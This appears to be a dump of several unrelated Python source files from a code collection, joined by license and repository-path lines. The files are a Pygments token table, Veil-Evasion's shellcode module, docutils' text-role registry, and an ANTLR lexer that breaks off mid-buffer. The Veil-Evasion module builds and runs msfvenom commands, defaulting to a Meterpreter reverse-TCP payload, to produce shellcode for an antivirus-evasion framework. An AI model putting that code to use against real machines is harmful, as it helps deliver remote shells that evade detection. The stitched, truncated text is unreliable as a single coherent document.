def is_token_subtype(ttype, other):
"""
Return True if ``ttype`` is a subtype of ``other``.
exists for backwards compatibility. use ``ttype in other`` now.
"""
return ttype in other
def string_to_tokentype(s):
"""
Convert a string into a token type::
>>> string_to_token('String.Double')
Token.Literal.String.Double
>>> string_to_token('Token.Literal.Number')
Token.Literal.Number
>>> string_to_token('')
Token
Tokens that are already tokens are returned unchanged:
>>> string_to_token(String)
Token.Literal.String
"""
if isinstance(s, _TokenType):
return s
if not s:
return Token
node = Token
for item in s.split('.'):
node = getattr(node, item)
return node
# Map standard token types to short names, used in CSS class naming.
# If you add a new item, please be sure to run this file to perform
# a consistency check for duplicate values.
STANDARD_TYPES = {
Token: '',
Text: '',
Whitespace: 'w',
Error: 'err',
Other: 'x',
Keyword: 'k',
Keyword.Constant: 'kc',
Keyword.Declaration: 'kd',
Keyword.Namespace: 'kn',
Keyword.Pseudo: 'kp',
Keyword.Reserved: 'kr',
Keyword.Type: 'kt',
Name: 'n',
Name.Attribute: 'na',
Name.Builtin: 'nb',
Name.Builtin.Pseudo: 'bp',
Name.Class: 'nc',
Name.Constant: 'no',
Name.Decorator: 'nd',
Name.Entity: 'ni',
Name.Exception: 'ne',
Name.Function: 'nf',
Name.Property: 'py',
Name.Label: 'nl',
Name.Namespace: 'nn',
Name.Other: 'nx',
Name.Tag: 'nt',
Name.Variable: 'nv',
Name.Variable.Class: 'vc',
Name.Variable.Global: 'vg',
Name.Variable.Instance: 'vi',
Literal: 'l',
Literal.Date: 'ld',
String: 's',
String.Backtick: 'sb',
String.Char: 'sc',
String.Doc: 'sd',
String.Double: 's2',
String.Escape: 'se',
String.Heredoc: 'sh',
String.Interpol: 'si',
String.Other: 'sx',
String.Regex: 'sr',
String.Single: 's1',
String.Symbol: 'ss',
Number: 'm',
Number.Float: 'mf',
Number.Hex: 'mh',
Number.Integer: 'mi',
Number.Integer.Long: 'il',
Number.Oct: 'mo',
Operator: 'o',
Operator.Word: 'ow',
Punctuation: 'p',
Comment: 'c',
Comment.Multiline: 'cm',
Comment.Preproc: 'cp',
Comment.Single: 'c1',
Comment.Special: 'cs',
Generic: 'g',
Generic.Deleted: 'gd',
Generic.Emph: 'ge',
Generic.Error: 'gr',
Generic.Heading: 'gh',
Generic.Inserted: 'gi',
Generic.Output: 'go',
Generic.Prompt: 'gp',
Generic.Strong: 'gs',
Generic.Subheading: 'gu',
Generic.Traceback: 'gt',
}
|
mit
|
g0tmi1k/veil-Evasion
|
modules/common/shellcode.py
|
3
|
24253
|
"""
Contains main Shellcode class as well as the Completer class used
for tab completion of metasploit payload selection.
"""
# Import Modules
import commands
import socket
import sys
import os
import sys
import re
import readline
import subprocess
import binascii
from modules.common import messages
from modules.common import helpers
from modules.common import completers
import settings
class Shellcode:
"""
Class that represents a shellcode object, custom of msfvenom generated.
"""
def __init__(self):
# the nested dictionary passed to the completer
self.payloadTree = {}
# the entier msfvenom command that may be built
self.msfvenomCommand = ""
# any associated msfvenom options
self.msfvenomOptions = list()
# in case user specifies a custom shellcode string
self.customshellcode = ""
# specific msfvenom payload specified
self.msfvenompayload= ""
# misc options
self.options = list()
# required options
self.required_options = list()
# load up all the metasploit modules available
self.LoadModules()
def Reset(self):
"""
reset the state of any internal variables, everything but self.payloadTree
"""
self.msfvenomCommand = ""
self.msfvenomOptions = list()
self.customshellcode = ""
self.msfvenompayload= ""
self.options = list()
def LoadModules(self):
"""
Crawls the metasploit install tree and extracts available payloads
and their associated required options for langauges specified.
"""
# Variable changed for compatibility with non-root and non-Kali users
# Thanks to Tim Medin for the patch
msfFolder = settings.METASPLOIT_PATH
# I can haz multiple platforms?
platforms = ["windows"]
for platform in platforms:
self.payloadTree[platform] = {}
stagesX86 = list()
stagersX86 = list()
stagesX64 = list()
stagersX64 = list()
# load up all the stages (meterpreter/vnc/etc.)
# TODO: detect Windows and modify the paths appropriately
for root, dirs, files in os.walk(settings.METASPLOIT_PATH + "/modules/payloads/stages/" + platform + "/"):
for f in files:
stageName = f.split(".")[0]
if "x64" in root:
stagesX64.append(f.split(".")[0])
if "x64" not in self.payloadTree[platform]:
self.payloadTree[platform]["x64"] = {}
self.payloadTree[platform]["x64"][stageName] = {}
elif "x86" in root: # linux payload structure format
stagesX86.append(f.split(".")[0])
if "x86" not in self.payloadTree[platform]:
self.payloadTree[platform]["x86"] = {}
self.payloadTree[platform]["x86"][stageName] = {}
else: # windows payload structure format
stagesX86.append(f.split(".")[0])
if stageName not in self.payloadTree[platform]:
self.payloadTree[platform][stageName] = {}
# load up all the stagers (reverse_tcp, bind_tcp, etc.)
# TODO: detect Windows and modify the paths appropriately
for root, dirs, files in os.walk(settings.METASPLOIT_PATH + "/modules/payloads/stagers/" + platform + "/"):
for f in files:
if ".rb" in f:
extraOptions = list()
moduleName = f.split(".")[0]
lines = open(root + "/" + f).readlines()
for line in lines:
if "OptString" in line.strip() and "true" in line.strip():
cmd = line.strip().split(",")[0].replace("OptString.new(","")[1:-1]
extraOptions.append(cmd)
if "bind" in f:
if "x64" in root:
for stage in stagesX64:
self.payloadTree[platform]["x64"][stage][moduleName] = ["LPORT"] + extraOptions
elif "x86" in root:
for stage in stagesX86:
self.payloadTree[platform]["x86"][stage][moduleName] = ["LPORT"] + extraOptions
else:
for stage in stagesX86:
self.payloadTree[platform][stage][moduleName] = ["LPORT"] + extraOptions
if "reverse" in f:
if "x64" in root:
for stage in stagesX64:
self.payloadTree[platform]["x64"][stage][moduleName] = ["LHOST", "LPORT"] + extraOptions
elif "x86" in root:
for stage in stagesX86:
self.payloadTree[platform]["x86"][stage][moduleName] = ["LHOST", "LPORT"] + extraOptions
else:
for stage in stagesX86:
self.payloadTree[platform][stage][moduleName] = ["LHOST", "LPORT"] + extraOptions
# load up any payload singles
# TODO: detect Windows and modify the paths appropriately
for root, dirs, files in os.walk(settings.METASPLOIT_PATH + "/modules/payloads/singles/" + platform + "/"):
for f in files:
if ".rb" in f:
lines = open(root + "/" + f).readlines()
totalOptions = list()
moduleName = f.split(".")[0]
for line in lines:
if "OptString" in line.strip() and "true" in line.strip():
cmd = line.strip().split(",")[0].replace("OptString.new(","")[1:-1]
totalOptions.append(cmd)
if "bind" in f:
totalOptions.append("LPORT")
if "reverse" in f:
totalOptions.append("LHOST")
totalOptions.append("LPORT")
if "x64" in root:
self.payloadTree[platform]["x64"][moduleName] = totalOptions
elif "x86" in root:
self.payloadTree[platform]["x86"][moduleName] = totalOptions
else:
self.payloadTree[platform][moduleName] = totalOptions
def SetPayload(self, payloadAndOptions):
"""
Manually set the payload/options, used in scripting
payloadAndOptions = nested 2 element list of [msfvenom_payload, ["option=value",...]]
i.e. ["windows/meterpreter/reverse_tcp", ["LHOST=192.168.1.1","LPORT=443"]]
"""
# extract the msfvenom payload and options
payload = payloadAndOptions[0]
options = payloadAndOptions[1]
# grab any specified msfvenom options in the /etc/veil/settings.py file
msfvenomOptions = ""
if hasattr(settings, "MSFVENOM_OPTIONS"):
msfvenomOptions = settings.MSFVENOM_OPTIONS
# build the msfvenom command
# TODO: detect Windows and modify the msfvenom command appropriately
self.msfvenomCommand = "msfvenom " + msfvenomOptions + " -p " + payload
# add options only if we have some
if options:
for option in options:
self.msfvenomCommand += " " + option + " "
self.msfvenomCommand += " -f c | tr -d \'\"\' | tr -d \'\\n\'"
# set the internal msfvenompayload to this payload
self.msfvenompayload = payload
# set the internal msfvenomOptions to these options
if options:
for option in options:
self.msfvenomOptions.append(option)
def setCustomShellcode(self, customShellcode):
"""
Manually set self.customshellcode to the shellcode string passed.
customShellcode = shellcode string ("\x00\x01...")
"""
self.customshellcode = customShellcode
def custShellcodeMenu(self, showTitle=True):
"""
Menu to prompt the user for a custom shellcode string.
Returns None if nothing is specified.
"""
# print out the main title to reset the interface
if showTitle:
messages.title()
print ' [?] Use msfvenom or supply custom shellcode?\n'
print ' %s - msfvenom %s' % (helpers.color('1'), helpers.color('(default)',yellow=True))
print ' %s - custom shellcode string' % (helpers.color('2'))
print ' %s - file with shellcode (raw)\n' % (helpers.color('3'))
try:
choice = self.required_options['SHELLCODE'][0].lower().strip()
print(" [>] Please enter the number of your choice: %s" % (choice))
except:
choice = raw_input(" [>] Please enter the number of your choice: ").strip()
if choice == '3':
# instantiate our completer object for path completion
comp = completers.PathCompleter()
# we want to treat '/' as part of a word, so override the delimiters
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(comp.complete)
# if the shellcode is specicified as a raw file
filePath = raw_input(" [>] Please enter the path to your raw shellcode file: ")
try:
shellcodeFile = open(filePath, 'rb')
CustShell = shellcodeFile.read()
shellcodeFile.close()
except:
print helpers.color(" [!] WARNING: path not found, defaulting to msfvenom!", warning=True)
return None
if len(CustShell) == 0:
print helpers.color(" [!] WARNING: no custom shellcode restrieved, defaulting to msfvenom!", warning=True)
return None
# check if the shellcode was passed in as string-escaped form
if CustShell[0:2] == "\\x" and CustShell[4:6] == "\\x":
return CustShell
else:
# otherwise encode the raw data as a hex string
hexString = binascii.hexlify(CustShell)
CustShell = "\\x"+"\\x".join([hexString[i:i+2] for i in range(0,len(hexString),2)])
return CustShell
# remove the completer
readline.set_completer(None)
elif choice == '2' or choice == 'string':
# if the shellcode is specified as a string
CustomShell = raw_input(" [>] Please enter custom shellcode (one line, no quotes, \\x00.. format): ")
if len(CustomShell) == 0:
print helpers.color(" [!] WARNING: no shellcode specified, defaulting to msfvenom!", warning=True)
return CustomShell
elif choice == '' or choice == '1' or choice == 'msf' or choice == 'metasploit' or choice == 'msfvenom':
return None
else:
print helpers.color(" [!] WARNING: Invalid option chosen, defaulting to msfvenom!", warning=True)
return None
def menu(self):
"""
Main interactive menu for shellcode selection.
Utilizes Completer() to do tab completion on loaded metasploit payloads.
"""
payloadSelected = None
options = None
showMessage = False
if settings.TERMINAL_CLEAR != "false": showMessage = True
# if no generation method has been selected yet
if self.msfvenomCommand == "" and self.customshellcode == "":
# show banner?
if settings.TERMINAL_CLEAR != "false": showMessage = True
# prompt for custom shellcode or msfvenom
customShellcode = self.custShellcodeMenu(showMessage)
# if custom shellcode is specified, set it
if customShellcode:
self.customshellcode = customShellcode
# else, if no custom shellcode is specified, prompt for metasploit
else:
# instantiate our completer object for tab completion of available payloads
comp = completers.MSFCompleter(self.payloadTree)
# we want to treat '/' as part of a word, so override the delimiters
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(comp.complete)
# have the user select the payload
while payloadSelected == None:
print '\n [*] Press %s for windows/meterpreter/reverse_tcp' % helpers.color('[enter]', yellow=True)
print ' [*] Press %s to list available payloads' % helpers.color('[tab]', yellow=True)
try:
payloadSelected = self.required_options['MSF_PAYLOAD'][0]
print ' [>] Please enter metasploit payload: %s' % (payloadSelected)
except:
payloadSelected = raw_input(' [>] Please enter metasploit payload: ').strip()
if payloadSelected == "":
# default to reverse_tcp for the payload
payloadSelected = "windows/meterpreter/reverse_tcp"
try:
parts = payloadSelected.split("/")
# walk down the selected parts of the payload tree to get to the options at the bottom
options = self.payloadTree
for part in parts:
options = options[part]
except KeyError:
# make sure user entered a valid payload
if 'PAYLOAD' in self.required_options: del self.required_options['PAYLOAD']
print helpers.color(" [!] ERROR: Invalid payload specified!\n", warning=True)
payloadSelected = None
# remove the tab completer
readline.set_completer(None)
# set the internal payload to the one selected
self.msfvenompayload = payloadSelected
# request a value for each required option
for option in options:
value = ""
while value == "":
### VALIDATION ###
# LHOST is a special case, so we can tab complete the local IP
if option == "LHOST":
try:
value = self.required_options['LHOST'][0]
print ' [>] Enter value for \'LHOST\', [tab] for local IP: %s' % (value)
except:
# set the completer to fill in the local IP
readline.set_completer(completers.IPCompleter().complete)
value = raw_input(' [>] Enter value for \'LHOST\', [tab] for local IP: ').strip()
if '.' in value:
hostParts = value.split(".")
if len(hostParts) > 1:
# if the last chunk is a number, assume it's an IP address
if hostParts[-1].isdigit():
# do a regex IP validation
if not re.match(r"^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$",value):
if 'LHOST' in self.required_options: del self.required_options['LHOST']
print helpers.color("\n [!] ERROR: Bad IP address specified.\n", warning=True)
value = ""
# otherwise assume we've been passed a domain name
else:
if not helpers.isValidHostname(value):
if 'LHOST' in self.required_options: del self.required_options['LHOST']
print helpers.color("\n [!] ERROR: Bad hostname specified.\n", warning=True)
value = ""
# if we don't have at least one period in the hostname/IP
else:
if 'LHOST' in self.required_options: del self.required_options['LHOST']
print helpers.color("\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True)
value = ""
elif ':' in value:
try:
socket.inet_pton(socket.AF_INET6, value)
except socket.error:
if 'LHOST' in self.required_options: del self.required_options['LHOST']
print helpers.color("\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True)
value = ""
else:
if 'LHOST' in self.required_options: del self.required_options['LHOST']
print helpers.color("\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True)
value = ""
elif option == "LPORT":
try:
value = self.required_options['LPORT'][0]
print ' [>] Enter value for \'LPORT\': %s' % (value)
except:
# set the completer to fill in the default MSF port (4444)
readline.set_completer(completers.MSFPortCompleter().complete)
value = raw_input(' [>] Enter value for \'LPORT\': ').strip()
try:
if int(value) <= 0 or int(value) >= 65535:
print helpers.color(" [!] ERROR: Bad port number specified.\n", warning=True)
if 'LPORT' in self.required_options: del self.required_options['LPORT']
value = ""
except ValueError:
print helpers.color(" [!] ERROR: Bad port number specified.\n", warning=True)
if 'LPORT' in self.required_options: del self.required_options['LPORT']
value = ""
else:
value = raw_input(' [>] Enter value for \'' + option + '\': ').strip()
# append all the msfvenom options
self.msfvenomOptions.append(option + "=" + value)
# allow the user to input any extra OPTION=value pairs
extraValues = list()
while True:
# clear out the tab completion
readline.set_completer(completers.none().complete)
selection = raw_input(' [>] Enter any extra msfvenom options (syntax: OPTION1=value1 or -OPTION2=value2): ').strip()
if selection != "":
num_extra_options = selection.split(' ')
for xtra_opt in num_extra_options:
if xtra_opt is not '':
if "=" not in xtra_opt:
print "parameter grammar error!"
continue
if "-" in xtra_opt.split('=')[0]:
final_opt = xtra_opt.split('=')[0] + " " + xtra_opt.split('=')[1]
extraValues.append(final_opt)
else:
final_opt = xtra_opt.split('=')[0] + "=" + xtra_opt.split('=')[1]
extraValues.append(final_opt)
else:
break
# grab any specified msfvenom options in the /etc/veil/settings.py file
msfvenomOptions = ""
if hasattr(settings, "MSFVENOM_OPTIONS"):
msfvenomOptions = settings.MSFVENOM_OPTIONS
# build out the msfvenom command
# TODO: detect Windows and modify the paths appropriately
self.msfvenomCommand = "msfvenom " + msfvenomOptions + " -p " + payloadSelected
for option in self.msfvenomOptions:
self.msfvenomCommand += " " + option
self.options.append(option)
if len(extraValues) != 0 :
self.msfvenomCommand += " " + " ".join(extraValues)
self.msfvenomCommand += " -f c | tr -d \'\"\' | tr -d \'\\n\'"
def generate(self, required_options=None):
"""
Based on the options set by menu(), setCustomShellcode() or SetPayload()
either returns the custom shellcode string or calls msfvenom
and returns the result.
Returns the shellcode string for this object.
"""
self.required_options = required_options
# if the msfvenom command nor shellcode are set, revert to the
# interactive menu to set any options
if self.msfvenomCommand == "" and self.customshellcode == "":
self.menu()
# return custom specified shellcode if it was set previously
if self.customshellcode != "":
return self.customshellcode
# generate the shellcode using msfvenom
else:
print helpers.color("\n [*] Generating shellcode...")
if self.msfvenomCommand == "":
print helpers.color(" [!] ERROR: msfvenom command not specified in payload!\n", warning=True)
return None
else:
# Stript out extra characters, new lines, etc., just leave the shellcode.
# Tim Medin's patch for non-root non-kali users
FuncShellcode = subprocess.check_output(settings.MSFVENOM_PATH + self.msfvenomCommand, shell=True)
# try to get the current MSF build version do we can determine how to
# parse the shellcode
# pretty sure it was this commit that changed everything-
# https://github.com/rapid7/metasploit-framework/commit/4dd60631cbc88e8e6d5322a94a492714ff83fe2f
try:
# get the latest metasploit build version
f = open(settings.METASPLOIT_PATH + "/build_rev.txt")
lines = f.readlines()
f.close()
# extract the build version/data
version = lines[0]
major,date = version.split("-")
# 2014021901 - the version build date where msfvenom shellcode changed
if int(date) < 2014021901:
# use the old way
return FuncShellcode[82:-1].strip()
else:
# new way
return FuncShellcode[22:-1].strip()
# on error, default to the new version
except:
return FuncShellcode[22:-1].strip()
|
gpl-3.0
|
paaschpa/badcomputering
|
docutils/parsers/rst/roles.py
|
6
|
13426
|
# $Id: roles.py 6451 2010-10-25 08:02:43Z milde $
# Author: Edward Loper <[email protected]>
# Copyright: This module has been placed in the public domain.
"""
This module defines standard interpreted text role functions, a registry for
interpreted text roles, and an API for adding to and retrieving from the
registry.
The interface for interpreted role functions is as follows::
def role_fn(name, rawtext, text, lineno, inliner,
options={}, content=[]):
code...
# Set function attributes for customization:
role_fn.options = ...
role_fn.content = ...
Parameters:
- ``name`` is the local name of the interpreted text role, the role name
actually used in the document.
- ``rawtext`` is a string containing the entire interpreted text construct.
Return it as a ``problematic`` node linked to a system message if there is a
problem.
- ``text`` is the interpreted text content, with backslash escapes converted
to nulls (``\x00``).
- ``lineno`` is the line number where the interpreted text beings.
- ``inliner`` is the Inliner object that called the role function.
It defines the following useful attributes: ``reporter``,
``problematic``, ``memo``, ``parent``, ``document``.
- ``options``: A dictionary of directive options for customization, to be
interpreted by the role function. Used for additional attributes for the
generated elements and other functionality.
- ``content``: A list of strings, the directive content for customization
("role" directive). To be interpreted by the role function.
Function attributes for customization, interpreted by the "role" directive:
- ``options``: A dictionary, mapping known option names to conversion
functions such as `int` or `float`. ``None`` or an empty dict implies no
options to parse. Several directive option conversion functions are defined
in the `directives` module.
All role functions implicitly support the "class" option, unless disabled
with an explicit ``{'class': None}``.
- ``content``: A boolean; true if content is allowed. Client code must handle
the case where content is required but not supplied (an empty content list
will be supplied).
Note that unlike directives, the "arguments" function attribute is not
supported for role customization. Directive arguments are handled by the
"role" directive itself.
Interpreted role functions return a tuple of two values:
- A list of nodes which will be inserted into the document tree at the
point where the interpreted role was encountered (can be an empty
list).
- A list of system messages, which will be inserted into the document tree
immediately after the end of the current inline block (can also be empty).
"""
__docformat__ = 'reStructuredText'
from docutils import nodes, utils
from docutils.parsers.rst import directives
from docutils.parsers.rst.languages import en as _fallback_language_module
DEFAULT_INTERPRETED_ROLE = 'title-reference'
"""
The canonical name of the default interpreted role. This role is used
when no role is specified for a piece of interpreted text.
"""
_role_registry = {}
"""Mapping of canonical role names to role functions. Language-dependent role
names are defined in the ``language`` subpackage."""
_roles = {}
"""Mapping of local or language-dependent interpreted text role names to role
functions."""
def role(role_name, language_module, lineno, reporter):
"""
Locate and return a role function from its language-dependent name, along
with a list of system messages. If the role is not found in the current
language, check English. Return a 2-tuple: role function (``None`` if the
named role cannot be found) and a list of system messages.
"""
normname = role_name.lower()
messages = []
msg_text = []
if normname in _roles:
return _roles[normname], messages
if role_name:
canonicalname = None
try:
canonicalname = language_module.roles[normname]
except AttributeError, error:
msg_text.append('Problem retrieving role entry from language '
'module %r: %s.' % (language_module, error))
except KeyError:
msg_text.append('No role entry for "%s" in module "%s".'
% (role_name, language_module.__name__))
else:
canonicalname = DEFAULT_INTERPRETED_ROLE
# If we didn't find it, try English as a fallback.
if not canonicalname:
try:
canonicalname = _fallback_language_module.roles[normname]
msg_text.append('Using English fallback for role "%s".'
% role_name)
except KeyError:
msg_text.append('Trying "%s" as canonical role name.'
% role_name)
# The canonical name should be an English name, but just in case:
canonicalname = normname
# Collect any messages that we generated.
if msg_text:
message = reporter.info('\n'.join(msg_text), line=lineno)
messages.append(message)
# Look the role up in the registry, and return it.
if canonicalname in _role_registry:
role_fn = _role_registry[canonicalname]
register_local_role(normname, role_fn)
return role_fn, messages
else:
return None, messages # Error message will be generated by caller.
def register_canonical_role(name, role_fn):
"""
Register an interpreted text role by its canonical name.
:Parameters:
- `name`: The canonical name of the interpreted role.
- `role_fn`: The role function. See the module docstring.
"""
set_implicit_options(role_fn)
_role_registry[name] = role_fn
def register_local_role(name, role_fn):
"""
Register an interpreted text role by its local or language-dependent name.
:Parameters:
- `name`: The local or language-dependent name of the interpreted role.
- `role_fn`: The role function. See the module docstring.
"""
set_implicit_options(role_fn)
_roles[name] = role_fn
def set_implicit_options(role_fn):
"""
Add customization options to role functions, unless explicitly set or
disabled.
"""
if not hasattr(role_fn, 'options') or role_fn.options is None:
role_fn.options = {'class': directives.class_option}
elif 'class' not in role_fn.options:
role_fn.options['class'] = directives.class_option
def register_generic_role(canonical_name, node_class):
"""For roles which simply wrap a given `node_class` around the text."""
role = GenericRole(canonical_name, node_class)
register_canonical_role(canonical_name, role)
class GenericRole:
"""
Generic interpreted text role, where the interpreted text is simply
wrapped with the provided node class.
"""
def __init__(self, role_name, node_class):
self.name = role_name
self.node_class = node_class
def __call__(self, role, rawtext, text, lineno, inliner,
options={}, content=[]):
set_classes(options)
return [self.node_class(rawtext, utils.unescape(text), **options)], []
class CustomRole:
"""
Wrapper for custom interpreted text roles.
"""
def __init__(self, role_name, base_role, options={}, content=[]):
self.name = role_name
self.base_role = base_role
self.options = None
if hasattr(base_role, 'options'):
self.options = base_role.options
self.content = None
if hasattr(base_role, 'content'):
self.content = base_role.content
self.supplied_options = options
self.supplied_content = content
def __call__(self, role, rawtext, text, lineno, inliner,
options={}, content=[]):
opts = self.supplied_options.copy()
opts.update(options)
cont = list(self.supplied_content)
if cont and content:
cont += '\n'
cont.extend(content)
return self.base_role(role, rawtext, text, lineno, inliner,
options=opts, content=cont)
def generic_custom_role(role, rawtext, text, lineno, inliner,
options={}, content=[]):
""""""
# Once nested inline markup is implemented, this and other methods should
# recursively call inliner.nested_parse().
set_classes(options)
return [nodes.inline(rawtext, utils.unescape(text), **options)], []
generic_custom_role.options = {'class': directives.class_option}
######################################################################
# Define and register the standard roles:
######################################################################
register_generic_role('abbreviation', nodes.abbreviation)
register_generic_role('acronym', nodes.acronym)
register_generic_role('emphasis', nodes.emphasis)
register_generic_role('literal', nodes.literal)
register_generic_role('strong', nodes.strong)
register_generic_role('subscript', nodes.subscript)
register_generic_role('superscript', nodes.superscript)
register_generic_role('title-reference', nodes.title_reference)
def pep_reference_role(role, rawtext, text, lineno, inliner,
options={}, content=[]):
try:
pepnum = int(text)
if pepnum < 0 or pepnum > 9999:
raise ValueError
except ValueError:
msg = inliner.reporter.error(
'PEP number must be a number from 0 to 9999; "%s" is invalid.'
% text, line=lineno)
prb = inliner.problematic(rawtext, rawtext, msg)
return [prb], [msg]
# Base URL mainly used by inliner.pep_reference; so this is correct:
ref = (inliner.document.settings.pep_base_url
+ inliner.document.settings.pep_file_url_template % pepnum)
set_classes(options)
return [nodes.reference(rawtext, 'PEP ' + utils.unescape(text), refuri=ref,
**options)], []
register_canonical_role('pep-reference', pep_reference_role)
def rfc_reference_role(role, rawtext, text, lineno, inliner,
options={}, content=[]):
try:
rfcnum = int(text)
if rfcnum <= 0:
raise ValueError
except ValueError:
msg = inliner.reporter.error(
'RFC number must be a number greater than or equal to 1; '
'"%s" is invalid.' % text, line=lineno)
prb = inliner.problematic(rawtext, rawtext, msg)
return [prb], [msg]
# Base URL mainly used by inliner.rfc_reference, so this is correct:
ref = inliner.document.settings.rfc_base_url + inliner.rfc_url % rfcnum
set_classes(options)
node = nodes.reference(rawtext, 'RFC ' + utils.unescape(text), refuri=ref,
**options)
return [node], []
register_canonical_role('rfc-reference', rfc_reference_role)
def raw_role(role, rawtext, text, lineno, inliner, options={}, content=[]):
if not inliner.document.settings.raw_enabled:
msg = inliner.reporter.warning('raw (and derived) roles disabled')
prb = inliner.problematic(rawtext, rawtext, msg)
return [prb], [msg]
if 'format' not in options:
msg = inliner.reporter.error(
'No format (Writer name) is associated with this role: "%s".\n'
'The "raw" role cannot be used directly.\n'
'Instead, use the "role" directive to create a new role with '
'an associated format.' % role, line=lineno)
prb = inliner.problematic(rawtext, rawtext, msg)
return [prb], [msg]
set_classes(options)
node = nodes.raw(rawtext, utils.unescape(text, 1), **options)
return [node], []
raw_role.options = {'format': directives.unchanged}
register_canonical_role('raw', raw_role)
def math_role(role, rawtext, text, lineno, inliner, options={}, content=[]):
i = rawtext.find('`')
text = rawtext.split('`')[1]
node = nodes.math(rawtext, text)
return [node], []
register_canonical_role('math', math_role)
######################################################################
# Register roles that are currently unimplemented.
######################################################################
def unimplemented_role(role, rawtext, text, lineno, inliner, attributes={}):
msg = inliner.reporter.error(
'Interpreted text role "%s" not implemented.' % role, line=lineno)
prb = inliner.problematic(rawtext, rawtext, msg)
return [prb], [msg]
register_canonical_role('index', unimplemented_role)
register_canonical_role('named-reference', unimplemented_role)
register_canonical_role('anonymous-reference', unimplemented_role)
register_canonical_role('uri-reference', unimplemented_role)
register_canonical_role('footnote-reference', unimplemented_role)
register_canonical_role('citation-reference', unimplemented_role)
register_canonical_role('substitution-reference', unimplemented_role)
register_canonical_role('target', unimplemented_role)
# This should remain unimplemented, for testing purposes:
register_canonical_role('restructuredtext-unimplemented-role',
unimplemented_role)
def set_classes(options):
"""
Auxiliary function to set options['classes'] and delete
options['class'].
"""
if 'class' in options:
assert 'classes' not in options
options['classes'] = options['class']
del options['class']
|
bsd-3-clause
|
Karumi/Kin
|
kin/grammar/PBXProjLexer.py
|
1
|
80888
|
# Generated from PBXProj.g4 by ANTLR 4.9.2
from antlr4 import *
from io import StringIO
import sys
if sys.version_info[1] > 5:
from typing import TextIO
else:
from typing.io import TextIO
def serializedATN():
with StringIO() as buf:
buf.write("\3\u608b\ua72a\u8133\ub9ed\u417c\u3be7\u7786\u5964\2\u0087")
buf.write("\u08cb\b\1\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7")
buf.write("\t\7\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r")
buf.write("\4\16\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22\4\23")
buf.write("\t\23\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27\4\30\t\30")
buf.write("\4\31\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35\t\35\4\36")
buf.write("\t\36\4\37\t\37\4 \t \4!\t!\4\"\t\"\4#\t#\4$\t$\4%\t%")
buf.write("\4&\t&\4\'\t\'\4(\t(\4)\t)\4*\t*\4+\t+\4,\t,\4-\t-\4.")
buf.write("\t.\4/\t/\4\60\t\60\4\61\t\61\4\62\t\62\4\63\t\63\4\64")
buf.write("\t\64\4\65\t\65\4\66\t\66\4\67\t\67\48\t8\49\t9\4:\t:")
buf.write("\4;\t;\4<\t<\4=\t=\4>\t>\4?\t?\4@\t@\4A\tA\4B\tB\4C\t")
buf.write("C\4D\tD\4E\tE\4F\tF\4G\tG\4H\tH\4I\tI\4J\tJ\4K\tK\4L\t")
buf.write("L\4M\tM\4N\tN\4O\tO\4P\tP\4Q\tQ\4R\tR\4S\tS\4T\tT\4U\t")
buf.write("U\4V\tV\4W\tW\4X\tX\4Y\tY\4Z\tZ\4[\t[\4\\\t\\\4]\t]\4")
buf.write("^\t^\4_\t_\4`\t`\4a\ta\4b\tb\4c\tc\4d\td\4e\te\4f\tf\4")
buf.write("g\tg\4h\th\4i\ti\4j\tj\4k\tk\4l\tl\4m\tm\4n\tn\4o\to\4")
buf.write("p\tp\4q\tq\4r\tr\4s\ts\4t\tt\4u\tu\4v\tv\4w\tw\4x\tx\4")
buf.write("y\ty\4z\tz\4{\t{\4|\t|\4}\t}\4~\t~\4\177\t\177\4\u0080")
buf.write("\t\u0080\4\u0081\t\u0081\4\u0082\t\u0082\4\u0083\t\u0083")
buf.write("\4\u0084\t\u0084\4\u0085\t\u0085\4\u0086\t\u0086\4\u0087")
buf.write("\t\u0087\4\u0088\t\u0088\3\2\3\2\3\3\3\3\3\4\3\4\3\4\3")
buf.write("\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\5\3\5")
buf.write("\3\6\3\6\3\7\3\7\3\7\3\7\3\7\3\7\3\7\3\7\3\7\3\7\3\7\3")
buf.write("\7\3\7\3\7\3\b\3\b\3\b\3\b\3\b\3\b\3\b\3\b\3\b\3\b\3\b")
buf.write("\3\b\3\b\3\b\3\b\3\b\3\b\3\b\3\b\3\t\3\t\3\t\3\t\3\t\3")
buf.write("\t\3\t\3\t\3\t\3\t\3\t\3\t\3\t\3\n\3\n\3\n\3\n\3\n\3\n")
buf.write("\3\n\3\n\3\n\3\n\3\n\3\n\3\n\3\n\3\n\3\n\3\n\3\n\3\n\3")
buf.write("\n\3\n\3\n\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13")
buf.write("\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13")
buf.write("\3\13\3\13\3\13\3\f\3\f\3\f\3\f\3\f\3\f\3\f\3\f\3\f\3")
buf.write("\f\3\f\3\f\3\f\3\f\3\f\3\f\3\f\3\r\3\r\3\r\3\r\3\r\3\r")
buf.write("\3\r\3\r\3\r\3\r\3\r\3\r\3\r\3\r\3\r\3\r\3\r\3\r\3\r\3")
buf.write("\r\3\r\3\r\3\r\3\r\3\16\3\16\3\16\3\16\3\16\3\16\3\16")
buf.write("\3\16\3\16\3\17\3\17\3\17\3\17\3\17\3\17\3\17\3\17\3\17")
buf.write("\3\17\3\17\3\17\3\17\3\17\3\17\3\17\3\17\3\17\3\17\3\17")
buf.write("\3\17\3\20\3\20\3\20\3\20\3\20\3\20\3\20\3\20\3\20\3\20")
buf.write("\3\20\3\20\3\20\3\20\3\20\3\20\3\21\3\21\3\21\3\21\3\21")
buf.write("\3\21\3\21\3\21\3\21\3\21\3\21\3\22\3\22\3\22\3\22\3\22")
